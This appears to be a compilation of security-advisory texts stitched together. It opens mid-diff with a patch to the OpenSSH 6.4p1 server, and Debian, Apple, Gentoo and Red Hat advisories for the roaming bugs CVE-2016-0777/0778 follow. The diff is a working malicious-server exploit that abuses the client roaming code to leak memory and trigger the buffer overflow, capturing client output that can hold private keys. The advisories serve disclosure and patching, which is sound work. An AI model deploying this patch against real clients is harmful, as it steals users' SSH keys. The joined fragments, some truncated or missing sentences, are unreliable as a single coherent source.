server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p2 \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. Users with private keys that are not protected by a\npassphrase are advised to generate new keys if they have connected to\nan SSH server they don\u0027t fully trust. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security update\nAdvisory ID: RHSA-2016:0043-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date: 2016-01-14\nCVE Names: CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 